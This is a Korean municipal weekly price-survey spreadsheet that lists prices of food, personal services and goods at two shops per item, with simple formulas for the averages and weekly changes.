A7: 1 | B7: 쌀 | C7: 일반미 20kg | D7: 2 | E7: =COUNTIF(K7,"<>0")+COUNTIF(O7,"<>0") -> 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 48800 | G7: 47650 | H7: =G7-F7 -> -1150 | I7: 광영농협 | J7: 45800 | K7: 45800 | L7: =K7-J7 -> 0 | M7: 지마트 | N7: 51800 | O7: 49500 | P7: =O7-N7 -> -2,300
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(N8,"<>0") -> 2 | E8: 2 | F8: 1000 | G8: 1000 | H8: 0 | I8: 광영농협 | J8: 1000 | K8: 1000 | L8: 0 | M8: 광영시장 | N8: 1000 | O8: 1000 | P8: 0
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 2 | E9: 2 | F9: 5000 | G9: 5000 | H9: 0 | I9: 광영농협 | J9: 6000 | K9: 6000 | L9: 0 | M9: 광영시장 | N9: 4000 | O9: 4000 | P9: 0
A10: 4 | B10: 양상추 | C10: 상품1개(350~400g) | D10: 2 | E10: 2 | F10: 2490 | G10: 2490 | H10: 0 | I10: 광영농협 | J10: 2980 | K10: 2980 | L10: 0 | M10: 광영시장 | N10: 2000 | O10: 2000 | P10: 0
A11: 5 | B11: 애호박 | C11: 상품1개(300~350g) | D11: 2 | E11: 2 | F11: 2740 | G11: 2740 | H11: 0 | I11: 광영농협 | J11: 2980 | K11: 2980 | L11: 0 | M11: 광영시장 | N11: 2500 | O11: 2500 | P11: 0
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 2 | E12: =COUNTIF(K12,"<>0")+COUNTIF(O12,"<>0") -> 0 | F12: 0 | G12: 0 | H12: 0 | I12: 광영농협 | J12: 0 | K12: 0 | M12: 광영시장 | N12: 0 | O12: 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: =COUNTIF(J13,"<>0")+COUNTIF(N13,"<>0") -> 2 | E13: 2 | F13: 1915 | G13: 2330 | H13: 415 | I13: 광영농협 | J13: 1830 | K13: 2660 | L13: 830 | M13: 광영시장 | N13: 2000 | O13: 2000 | P13: 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 2 | E14: =COUNTIF(K14,"<>0")+COUNTIF(O14,"<>0") -> 2 | F14: 5220 | G14: 5220 | H14: 0 | I14: 광영농협 | J14: 5940 | K14: 5940 | L14: 0 | M14: 광영시장 | N14: 4500 | O14: 4500 | P14: 0
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 2 | E15: 2 | F15: 10000 | G15: 13250 | H15: 3250 | I15: 광영농협 | J15: 9000 | K15: 13500 | L15: 4,500 | M15: 광영시장 | N15: 11000 | O15: 13000 | P15: 2,000
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 2 | E16: 2 | F16: 9300 | G16: 9300 | H16: 0 | I16: 광영농협 | J16: 9600 | K16: 9600 | L16: 0 | M16: 광영시장 | N16: 9000 | O16: 9000 | P16: 0
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 2 | E17: 2 | F17: 3900 | G17: 4150 | H17: 250 | I17: 광영농협 | J17: 4800 | K17: 4800 | L17: 0 | M17: 광영시장 | N17: 3000 | O17: 3500 | P17: 500
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: 2 | E18: 2 | F18: 3500 | G18: 2980 | H18: -520 | I18: 광영농협 | J18: 4000 | K18: 2960 | L18: -1,040 | M18: 광영시장 | N18: 3000 | O18: 3000 | P18: 0
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 2 | E19: 2 | F19: 1490 | G19: 1490 | H19: 0 | I19: 광영농협 | J19: 1980 | K19: 1980 | L19: 0 | M19: 광영시장 | N19: 1000 | O19: 1000 | P19: 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: 2 | E20: 2 | F20: 4580 | G20: 3455 | H20: -1125 | I20: 광영농협 | J20: 4160 | K20: 2910 | L20: -1,250 | M20: 광영시장 | N20: 5000 | O20: 4000 | P20: -1,000
A21: 15 | B21: 배 | C21: (600-700) | D21: 2 | E21: 2 | F21: 5130 | G21: 3980 | H21: -1150 | I21: 광영농협 | J21: 5260 | K21: 3960 | L21: -1,300 | M21: 광영시장 | N21: 5000 | O21: 4000 | P21: -1,000
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: 2 | E22: 2 | F22: 3690 | G22: 3900 | H22: 210 | I22: 광영농협 | J22: 3380 | K22: 3800 | L22: 420 | M22: 광영시장 | N22: 4000 | O22: 4000 | P22: 0
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: 2 | E23: 2 | F23: 53400 | G23: 53400 | H23: 0 | I23: 광영농협 | J23: 49800 | K23: 49800 | L23: 0 | M23: 광영시장 | N23: 57000 | O23: 57000 | P23: 0
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: 1 | E24: 1 | F24: 12000 | G24: 12000 | H24: 0 | I24: 광영농협 | L24: 0 | M24: 광영시장 | N24: 12000 | O24: 12000 | P24: 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: =COUNTIF(J25,"<>0")+COUNTIF(N25,"<>0") -> 2 | E25: 2 | F25: 12840 | G25: 11940 | H25: -900 | I25: 광영농협 | J25: 11880 | K25: 10080 | L25: -1,800 | M25: 광영시장 | N25: 13800 | O25: 13800 | P25: 0
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: 2 | E26: 2 | F26: 8250 | G26: 8250 | H26: 0 | I26: 광영농협 | J26: 8500 | K26: 8500 | L26: 0 | M26: 광영시장 | N26: 8000 | O26: 8000 | P26: 0
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: 2 | E27: 2 | F27: 8200 | G27: 8200 | H27: 0 | I27: 광영농협 | J27: 8400 | K27: 8400 | L27: 0 | M27: 광영시장 | N27: 8000 | O27: 8000 | P27: 0
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: 2 | E28: 2 | F28: 2900 | G28: 2900 | H28: 0 | I28: 광영농협 | J28: 2300 | K28: 2300 | L28: 0 | M28: 광영시장 | N28: 3500 | O28: 3500 | P28: 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: =COUNTIF(J29,"<>0")+COUNTIF(N29,"<>0") -> 2 | E29: 2 | F29: 4725 | G29: 4725 | H29: 0 | I29: 광영농협 | J29: 4450 | K29: 4450 | L29: 0 | M29: 광영시장 | N29: 5000 | O29: 5000 | P29: 0
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: 2 | E30: 2 | F30: 3500 | G30: 3500 | H30: 0 | I30: 광영농협 | J30: 3500 | K30: 3500 | L30: 0 | M30: 광영시장 | N30: 3500 | O30: 3500 | P30: 0
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: 2 | E31: 2 | F31: 3200 | G31: 2900 | H31: -300 | I31: 광영농협 | J31: 2900 | K31: 2300 | L31: -600 | M31: 광영시장 | N31: 3500 | O31: 3500 | P31: 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: 2 | E32: 2 | F32: 6000 | G32: 6000 | H32: 0 | I32: 광영농협 | J32: 6000 | K32: 6000 | L32: 0 | M32: 광영시장 | N32: 6000 | O32: 6000 | P32: 0
A33: 27 | B33: 콩 | C33: 1kg | D33: 2 | E33: 2 | F33: 8320 | G33: 8320 | H33: 0 | I33: 광영농협 | J33: 9640 | K33: 9640 | L33: 0 | M33: 광영시장 | N33: 7000 | O33: 7000 | P33: 0
A34: 28 | B34: 고춧가루 | C34: 3kg | D34: 2 | E34: 2 | F34: 96400 | G34: 96400 | H34: 0 | I34: 광영농협 | J34: 112800 | K34: 112800 | L34: 0 | M34: 광영시장 | N34: 80000 | O34: 80000 | P34: 0
A35: 개인서비스 요금(49개 품목)
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: 1 | E36: 1 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 10000 | G36: 10000 | H36: =G36-F36 -> 0 | I36: 이신자설렁탕 | J36: 10000 | K36: 10000 | L36: =K36-J36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(N37,"<>0") -> 2 | E37: 2 | F37: 6500 | G37: 6500 | H37: 0 | I37: 김가네 | J37: 7000 | K37: 7000 | L37: 0 | M37: 김밥천국 | N37: 6000 | O37: 6000 | P37: =O37-N37 -> 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: 2 | E38: 2 | F38: 5750 | G38: 5750 | H38: 0 | I38: 김가네 | J38: 6000 | K38: 6000 | L38: 0 | M38: 김밥천국 | N38: 5500 | O38: 5500 | P38: 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: 2 | E39: 2 | F39: 13500 | G39: 13500 | H39: 0 | I39: 이신자설렁탕 | J39: 15000 | K39: 15000 | L39: 0 | M39: 조선옥 | N39: 12000 | O39: 12000 | P39: 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: 2 | E40: 2 | F40: 14500 | G40: 14500 | H40: 0 | I40: 원진삼계탕 | J40: 14000 | K40: 14000 | L40: 0 | M40: 능이야산에가자 | N40: 15000 | O40: 15000 | P40: 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: 2 | E41: 2 | F41: 8500 | G41: 8500 | H41: 0 | I41: 팔구식당 | J41: 9000 | K41: 9000 | L41: 0 | M41: 호롱식당 (금호식당) | N41: 8000 | O41: 8000 | P41: 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: 2 | E42: 2 | F42: 8500 | G42: 8500 | H42: 0 | I42: 팔구식당 | J42: 9000 | K42: 9000 | L42: 0 | M42: 호롱식당 (금호식당) | N42: 8000 | O42: 8000 | P42: 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: 2 | E43: 2 | F43: 16500 | G43: 16500 | H43: 0 | I43: 조선옥 | J43: 21000 | K43: 21000 | L43: 0 | M43: 맛내골 | N43: 12000 | O43: 12000 | P43: 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: 2 | E44: 2 | F44: 46920 | G44: 46920 | H44: 0 | I44: 조선옥 | J44: 53840 | K44: 53840 | L44: 0 | M44: 고기마을 | N44: 40000 | O44: 40000 | P44: 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: 1 | E45: 1 | F45: 12900 | G45: 12900 | H45: 0 | I45: 가산팔보초밥 | J45: 12900 | K45: 12900 | L45: 0 | M45: 없음 | N45: 0 | O45: 0 | P45: 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: 2 | E46: 2 | F46: 18000 | G46: 18000 | H46: 0 | I46: 아주커통닭 | J46: 18000 | K46: 18000 | L46: 0 | M46: 네네두마리치킨 | N46: 18000 | O46: 18000 | P46: 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: 2 | E47: 2 | F47: 7000 | G47: 7000 | H47: 0 | I47: 바지락칼국수 | J47: 7000 | K47: 7000 | L47: 0 | M47: 짱칼국수 | N47: 7000 | O47: 7000 | P47: 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: 2 | E48: 2 | F48: 4000 | G48: 4000 | H48: 0 | I48: 김가네 | J48: 4000 | K48: 4000 | L48: 0 | M48: 꼬마김밥여행 | N48: 4000 | O48: 4000 | P48: 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: 2 | E49: 2 | F49: 3750 | G49: 3750 | H49: 0 | I49: 김가네 | J49: 3500 | K49: 3500 | L49: 0 | M49: 꼬마김밥여행 | N49: 4000 | O49: 4000 | P49: 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: 2 | E50: 2 | F50: 6000 | G50: 6000 | H50: 0 | I50: 자금성 | J50: 6000 | K50: 6000 | L50: 0 | M50: 장수관 | N50: 6000 | O50: 6000 | P50: 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: 2 | E51: 2 | F51: 8000 | G51: 8000 | H51: 0 | I51: 자금성 | J51: 7000 | K51: 7000 | L51: 0 | M51: 장수관 | N51: 9000 | O51: 9000 | P51: 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: 2 | E52: 2 | F52: 17500 | G52: 17500 | H52: 0 | I52: 자금성 | J52: 17000 | K52: 17000 | L52: 0 | M52: 장수관 | N52: 18000 | O52: 18000 | P52: 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: 2 | E53: 2 | F53: 7250 | G53: 7250 | H53: 0 | I53: 김가네 | J53: 8500 | K53: 8500 | L53: 0 | M53: 김밥천국 | N53: 6000 | O53: 6000 | P53: 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: 2 | E54: 2 | F54: 3500 | G54: 3500 | H54: 0 | I54: 하나베이커리 | J54: 3000 | K54: 3000 | L54: 0 | M54: 브레드빈 | N54: 4000 | O54: 4000 | P54: 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: =COUNTIF(J55,"<>0")+COUNTIF(N55,"<>0") -> 2 | E55: 2 | F55: 11950 | G55: 11950 | H55: 0 | I55: 히트피자 | J55: 13000 | K55: 13000 | L55: 0 | M55: 피자스쿨 | N55: 10900 | O55: 10900 | P55: 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: 2 | E56: 2 | F56: 3250 | G56: 3250 | H56: 0 | I56: 데일리에 스프레소 | J56: 3500 | K56: 3500 | L56: 0 | M56: 청자다방 | N56: 3000 | O56: 3000 | P56: 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: 2 | E57: 2 | F57: 3250 | G57: 3250 | H57: 0 | I57: 데일리에 스프레소 | J57: 4000 | K57: 4000 | L57: 0 | M57: 청자다방 | N57: 2500 | O57: 2500 | P57: 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: 2 | E58: 2 | F58: 13500 | G58: 13500 | H58: 0 | I58: 조선옥 | J58: 14000 | K58: 14000 | L58: 0 | M58: 화성갈비 | N58: 13000 | O58: 13000 | P58: 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: 2 | E59: 2 | F59: 13500 | G59: 13500 | H59: 0 | I59: 조선옥 | J59: 14000 | K59: 14000 | L59: 0 | M59: 화성갈비 | N59: 13000 | O59: 13000 | P59: 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: 1 | E60: 1 | F60: 32000 | G60: 32000 | H60: 0 | I60: 조선옥 | J60: 32000 | K60: 32000 | L60: 0 | M60: 고기마을 | N60: 0 | O60: 0 | P60: 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: 2 | E61: 2 | F61: 3900 | G61: 3900 | H61: 0 | I61: 네네두마리치킨 | J61: 4000 | K61: 4000 | L61: 0 | M61: 김복남맥주1995 | N61: 3800 | O61: 3800 | P61: 0
A62: 27 | B62: 공동 주택관리비 | C62: 목우 18평1개월 (공과금 제외) | D62: 2 | E62: 2 | F62: 54500 | G62: 54500 | H62: 0 | I62: 목우아파트 | J62: 60000 | K62: 60000 | L62: 0 | M62: 현대저층아파트 | N62: 49000 | O62: 49000 | P62: 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: 2 | E63: 2 | F63: 12000 | G63: 12000 | H63: 0 | I63: 대도세탁소 | J63: 12000 | K63: 12000 | L63: 0 | M63: 뉴스타세탁소 | N63: 12000 | O63: 12000 | P63: 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: 2 | E64: 2 | F64: 6000 | G64: 6000 | H64: 0 | I64: 대도세탁소 | J64: 6000 | K64: 6000 | L64: 0 | M64: 뉴스타세탁소 | N64: 6000 | O64: 6000 | P64: 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: 0 | E65: 0 | F65: 0 | G65: 0 | H65: 0 | I65: 없음 | M65: 없음
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: 0 | E66: 0 | F66: 0 | G66: 0 | H66: 0 | I66: 없음 | M66: 없음
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 0 | E67: 0 | F67: 0 | G67: 0 | H67: 0 | I67: 없음 | M67: 없음
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: 0 | E68: 0 | F68: 0 | G68: 0 | H68: 0 | I68: 없음 | M68: 없음
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: 2 | E69: 2 | F69: 150000 | G69: 150000 | H69: 0 | I69: 조프로골프장 | J69: 150000 | K69: 150000 | L69: =K69-J69 -> 0 | M69: 광영골프장 | N69: 150000 | O69: 150000 | P69: =O69-N69 -> 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: =COUNTIF(J70,"<>0")+COUNTIF(N70,"<>0") -> 2 | E70: 2 | F70: 25000 | G70: 25000 | H70: 0 | I70: J J노래방 | J70: 25000 | K70: 25000 | L70: 0 | M70: 열정노래방 | N70: 25000 | O70: 25000 | P70: 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: 2 | E71: 2 | F71: 10000 | G71: 10000 | H71: 0 | I71: 에스당구장 | J71: 10000 | K71: 10000 | L71: 0 | M71: 신당구장 | N71: 10000 | O71: 10000 | P71: 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: 2 | E72: 2 | F72: 16500 | G72: 16500 | H72: 0 | I72: 대성사진관 | J72: 15000 | K72: 15000 | L72: 0 | M72: 디지털포토 | N72: 18000 | O72: 18000 | P72: 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: 2 | E73: 2 | F73: 2500 | G73: 2500 | H73: 0 | I73: 대성사진관 | J73: 5000 | K73: 5000 | L73: 0 | M73: 디디지털포토 | N73: 0 | O73: 0 | P73: 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 0 | E74: 0 | F74: 0 | G74: 0 | H74: 0 | I74: 없음 | M74: 없음 | P74: 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: =COUNTIF(J75,"<>0")+COUNTIF(N75,"<>0") -> 2 | E75: 2 | F75: 18000 | G75: 18000 | H75: 0 | I75: 명동이발관 | J75: 18000 | K75: 18000 | L75: =K75-J75 -> 0 | M75: 경민이발관 | N75: 18000 | O75: 18000 | P75: 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: 2 | E76: 2 | F76: 40000 | G76: 40000 | H76: 0 | I76: 이쁘게멎지게 | J76: 40000 | K76: 40000 | L76: 0 | M76: 예쁘다 | N76: 40000 | O76: 40000 | P76: 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: 2 | E77: 2 | F77: 8250 | G77: 8250 | H77: 0 | I77: 스파렉스 | J77: 9500 | K77: 9500 | L77: 0 | M77: 궁전사우나 | N77: 7000 | O77: 7000 | P77: 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: 0 | E78: 0 | F78: 0 | G78: 0 | H78: 0 | I78: 없음 | M78: 없음
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: =COUNTIF(J79,"<>0")+COUNTIF(N79,"<>0") -> 2 | E79: 2 | F79: 40000 | G79: 40000 | H79: 0 | I79: 모리스모텔 | J79: 40000 | K79: 40000 | L79: =K79-J79 -> 0 | M79: 코리아모텔 | N79: 40000 | O79: 40000 | P79: =O79-N79 -> 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 0 | E80: 0 | I80: 없음 | M80: 없음
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: =COUNTIF(J81,"<>0")+COUNTIF(N81,"<>0") -> 2 | E81: 2 | F81: =IF(D81=0,0,SUM(J81,N81)/D81) -> 1100 | G81: 1100 | H81: =G81-F81 -> 0 | I81: 초콜렛pc존 | J81: 1200 | K81: 1200 | L81: =K81-J81 -> 0 | M81: 몬스터pc | N81: 1000 | O81: 1000 | P81: =O81-N81 -> 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 1 | E82: 1 | F82: 16000 | G82: 16000 | H82: 0 | I82: CJ택배 | J82: 8000 | K82: 8000 | L82: 0 | M82: 우체국택배 (추가) | N82: 8000 | O82: 8000 | P82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 1 | E83: 1 | F83: 13500 | G83: 13500 | H83: 0 | I83: 스파렉스 | J83: 13500 | K83: 13500 | L83: 0 | M83: 없음 | P83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 0 | E84: 0 | I84: 없음 | M84: 없음 | P84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 5625 | G86: 5625 | H86: =G86-F86 -> 0 | I86: 광영농협 | J86: 5350 | K86: 5350 | L86: =K86-J86 -> 0 | M86: G마트 | N86: 5900 | O86: 5900 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: 2 | E87: 2 | F87: 970 | G87: 970 | H87: 0 | I87: 광영농협 | J87: 950 | K87: 950 | L87: 0 | M87: G마트 | N87: 990 | O87: 990 | P87: 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 2 | E88: 2 | F88: 1140 | G88: 1140 | H88: 0 | I88: 광영농협 | J88: 1080 | K88: 1080 | L88: 0 | M88: G마트 | N88: 1200 | O88: 1200 | P88: 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 2 | E89: 2 | F89: 6980 | G89: 6480 | H89: -500 | I89: 광영농협 | J89: 6980 | K89: 6980 | L89: 0 | M89: G마트 | N89: 6980 | O89: 5980 | P89: -1,000
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 2 | E90: 2 | F90: 2680 | G90: 2680 | H90: 0 | I90: 광영농협 | J90: 2380 | K90: 2380 | L90: 0 | M90: G마트 | N90: 2980 | O90: 2980 | P90: 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 2 | E91: 2 | F91: 515 | G91: 515 | H91: 0 | I91: 광영농협 | J91: 480 | K91: 480 | L91: 0 | M91: G마트 | N91: 550 | O91: 550 | P91: 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 2 | E92: 2 | F92: 1760 | G92: 1760 | H92: 0 | I92: 광영농협 | J92: 1670 | K92: 1670 | L92: 0 | M92: G마트 | N92: 1850 | O92: 1850 | P92: 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 2 | E93: 2 | F93: 1470 | G93: 1470 | H93: 0 | I93: 광영농협 | J93: 1390 | K93: 1390 | L93: 0 | M93: G마트 | N93: 1550 | O93: 1550 | P93: 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: 0 | E94: 0 | F94: 0 | G94: 0 | H94: 0 | I94: 제철주유소 | J94: 0 | K94: 0 | L94: 0 | N94: 0 | O94: 0 | P94: 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: =COUNTIF(J95,"<>0")+COUNTIF(N95,"<>0") -> 2 | E95: 2 | F95: 1443.5 | G95: 1456.5 | H95: 13 | I95: 제철주유소 | J95: 1458 | K95: 1468 | L95: 10 | M95: 광영우리주유소 (알뜰) | N95: 1429 | O95: 1445 | P95: 16
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: 2 | E96: 2 | F96: 1547 | G96: 1566.5 | H96: 19.5 | I96: 제철주유소 | J96: 1558 | K96: 1588 | L96: 30 | M96: 광영우리주유소 (알뜰) | N96: 1536 | O96: 1545 | P96: 9
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 2 | E97: 2 | F97: 140000 | G97: 140000 | H97: 0 | I97: 그라미피아노 | J97: 140000 | K97: 140000 | L97: 0 | M97: 유신영피아노 | N97: 140000 | O97: 140000 | P97: 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 1 | E98: 1 | F98: 120000 | G98: 120000 | H98: 0 | I98: 선영미술학원 | J98: 120000 | K98: 120000 | L98: 0 | P98: 0

Sheet 옥곡면
A2: 주간 물간동향 (옥곡면)
M3: 조사자 : 김보미
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(옥곡5일시장) | M4: 조 사 2 지 역(옥곡하나로마트)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg(웰빙간척) | D7: 2 | E7: =COUNTIF(K7,"<>0")+COUNTIF(O7,"<>0") -> 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 57500 | G7: 57500 | H7: =G7-F7 -> 0 | I7: 옥곡5일시장 | J7: 58000 | K7: 58000 | L7: =K7-J7 -> 0 | M7: 옥곡하나로마트 | N7: 57000 | O7: 57000 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(N8,"<>0") -> 2 | E8: 2 | F8: 1350 | G8: 1150 | H8: -200 | I8: 옥곡5일시장 | J8: 1000 | K8: 1000 | L8: 0 | M8: 옥곡하나로마트 | N8: 1700 | O8: 1300 | P8: -400
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 2 | E9: 2 | F9: 5000 | G9: 5500 | H9: 500 | I9: 옥곡5일시장 | J9: 3000 | K9: 4000 | L9: 1000 | M9: 옥곡하나로마트 | N9: 7000 | O9: 7000 | P9: 0
A10: 4 | B10: 양상추 | C10: 상품1개(350~400g) | D10: 2 | E10: 2 | F10: 1500 | G10: 1250 | H10: -250 | I10: 옥곡5일시장 | J10: 1500 | K10: 1500 | L10: 0 | M10: 옥곡하나로마트 | N10: 1500 | O10: 1000 | P10: -500
A11: 5 | B11: 애호박 | C11: 상품1개(300~350g) | D11: 2 | E11: 2 | F11: 2325 | G11: 2450 | H11: 125 | I11: 옥곡5일시장 | J11: 2500 | K11: 2500 | L11: 0 | M11: 옥곡하나로마트 | N11: 2150 | O11: 2400 | P11: 250
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: 0 | E12: 0 | F12: 0 | G12: 0 | H12: 0 | I12: 옥곡5일시장 | J12: 0 | K12: 0 | L12: 0 | M12: 옥곡하나로마트 | N12: 0 | O12: 0 | P12: 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: 2 | E13: 2 | F13: 2140 | G13: 2140 | H13: 0 | I13: 옥곡5일시장 | J13: 2250 | K13: 2250 | L13: 0 | M13: 옥곡하나로마트 | N13: 2030 | O13: 2030 | P13: 0
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: 2 | E14: 2 | F14: 4200 | G14: 4200 | H14: 0 | I14: 옥곡5일시장 | J14: 3000 | K14: 3000 | L14: 0 | M14: 옥곡하나로마트 | N14: 5400 | O14: 5400 | P14: 0
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: 2 | E15: 2 | F15: 10750 | G15: 11500 | H15: 750 | I15: 옥곡5일시장 | J15: 8000 | K15: 8000 | L15: 0 | M15: 옥곡하나로마트 | N15: 13500 | O15: 15000 | P15: 1500
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: 2 | E16: 2 | F16: 10600 | G16: 8500 | H16: -2100 | I16: 옥곡5일시장 | J16: 8000 | K16: 8000 | L16: 0 | M16: 옥곡하나로마트 | N16: 13200 | O16: 9000 | P16: -4200
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: 2 | E17: 2 | F17: 3750 | G17: 4000 | H17: 250 | I17: 옥곡5일시장 | J17: 2500 | K17: 3000 | L17: 500 | M17: 옥곡하나로마트 | N17: 5000 | O17: 5000 | P17: 0
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: 2 | E18: 2 | F18: 2200 | G18: 2000 | H18: -200 | I18: 옥곡5일시장 | J18: 2000 | K18: 2000 | L18: 0 | M18: 옥곡하나로마트 | N18: 2400 | O18: 2000 | P18: -400
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: 2 | E19: 2 | F19: 1490 | G19: 1490 | H19: 0 | I19: 옥곡5일시장 | J19: 1000 | K19: 1000 | L19: 0 | M19: 옥곡하나로마트 | N19: 1980 | O19: 1980 | P19: 0
